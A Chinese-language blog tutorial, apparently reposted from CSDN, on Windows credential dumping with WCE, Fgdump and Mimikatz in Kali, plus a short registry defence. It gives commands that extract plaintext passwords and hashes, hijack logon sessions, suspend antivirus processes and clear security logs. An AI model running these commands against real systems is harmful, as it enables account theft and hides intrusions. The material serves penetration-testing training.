天天看點

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

1. Windows身份認證的過程

在登入目标系統時,會将輸入的密碼進行lmhash和nthash加密;

然後将加密後的密碼與SAM賬戶資料庫進行比對,如果比對比對,則成功登入作業系統;

如果是遠端的主機嘗試進行登入目标系統,也是通過遠端主機自身将輸入的密碼進行lmhash和nthash計算,将加密後的密文通過網絡進行傳輸到目标主機;

是以,不論是本地還是遠端登入作業系統,密碼都是以密文的形式進行傳輸,相對安全,當然也可以用hash碰撞的方式進行爆破;

注:在登陸的目标服務系統後,有一個wdigest安全包,直接從記憶體總讀取賬戶資訊,會在本地緩存一個明文密碼,當登出登陸後,該賬戶資訊會被删除;

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

2. WCE(Windows credential editor)——Windows身份驗證資訊編輯器

WCE是一款功能強大的windows平台内網滲透的工具,使用WCE必須要有管理者的權限;

它內建在kali的工具包的windows程式中,可以共享給win_XP;

它可以列舉登陸會話,并且可以添加、改變和删除相關憑據。在内網滲透中非常強大;主要功能參數如下:

檢視目前系統中的賬戶資訊;

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

(1) wce-universal.exe -l

# 檢視目前登入的賬戶和加密的密碼,其中,計算機名也會被當做使用者來處理;

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

(2)wce-universal.exe -lv

# 檢視登入狀态使用者的詳細資訊,包括LUID,賬戶和加密後的密碼等;

# 檢視資訊時,首先嘗試安全模式,直接從記憶體中讀取資訊,讀取失敗後,會嘗試注入模式(可能對系統造成損害)

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz
linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz
linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

(3) wce-universal.exe -d LUID

wce-universal.exe -d 00408339,# 删除一個指定會話的LUID,删除y使用者的LUID,可以看到y使用者的目前會話沒有了;

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz
linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

(4) wce-universal.exe -r

# 顯示目前最新登入資訊,5秒重新整理一次;在此過程中,嘗試登入z賬戶,可以看到已經重新整理出z賬戶的會話資訊;

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

(5) wce-universal.exe -g 123456

# 對指定的内容進行hash計算;

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

(6) wce-universal.exe -w

# 以明文形式讀取密碼,最常用和實際的作用;

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

(7) 修改使用者的登入會話,将z使用者的登入會話修改成另外的一個使用者yaoxingzhi;

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

wce-universal.exe -i 00523687 -s yaoxingzhi:UPWARD:

AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz
linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

(8)防禦WCE攻擊

系統通過Digest Authentication Package維護明文密碼,預設自啟動,可在系統資料庫(regedit)中關閉預設啟動。

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Package

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

可以看到在系統資料庫中關閉維護明文密碼之後,再次運作wce-universal.exe -w,不能擷取任何的資訊,并且系統會自動重新開機;

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

3. Fgdump工具

Fgdump是內建在Kali上的Windows工具;可以下載下傳到win_XP上使用;

輕按兩下fgdump,可以得到如下三個檔案,其中一個包括賬戶和加密的密碼檔案;

擷取到加密的密碼後,可以通過Kali內建的工具進行hash碰撞;

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

4. mimikatz工具

Mimikatz(usr/share/mimikatz)是在Kali上內建的Windows工具;

Mimikatz工具是由俄羅斯人寫的,用法跟其他的工具不太一樣;

常見的功能如下所示:

(1) ::       #檢視幫助資訊;

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

(2)privilege::debug        #提升權限;

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

(3)sekurlsa::logonPasswords          #檢視登入狀态的賬戶和密碼;

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

登入切換另外的賬戶;可以檢視所有登入賬戶的使用者名和密碼;

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

(4)process子產品

4.1> 檢視可以執行的子子產品;

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

4.2> 檢視程序清單;

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

4.3> 開啟一個程序;

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

4.4> suspend   #挂起程序:可用于植入木馬時,暫停防病毒軟體等;

(5)lsadump子產品    # lsadump::sam從SAM資料庫中讀取賬号密碼,在XP中不成功,但在WIN7、win8中可能成功;

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

(6)event子產品

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

6.1>  event::clear    # 清除作業系統的安全日志

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

6.2> event::drop      #不再進行新的日志

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

(7) misc子產品

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

misc::cmd    #打開cmd指令行視窗;

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

(8)token子產品

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

token::whoami

linux 安全模式 提權,Kali Linux滲透測試之提權(二)——WCE、Fgdump、Mimikatz

————————————————

版權聲明:本文為CSDN部落客「橘子女俠」的原創文章,遵循CC 4.0 BY-SA版權協定,轉載請附上原文出處連結及本聲明。

原文連結:https://blog.csdn.net/qq_38684504/article/details/89481147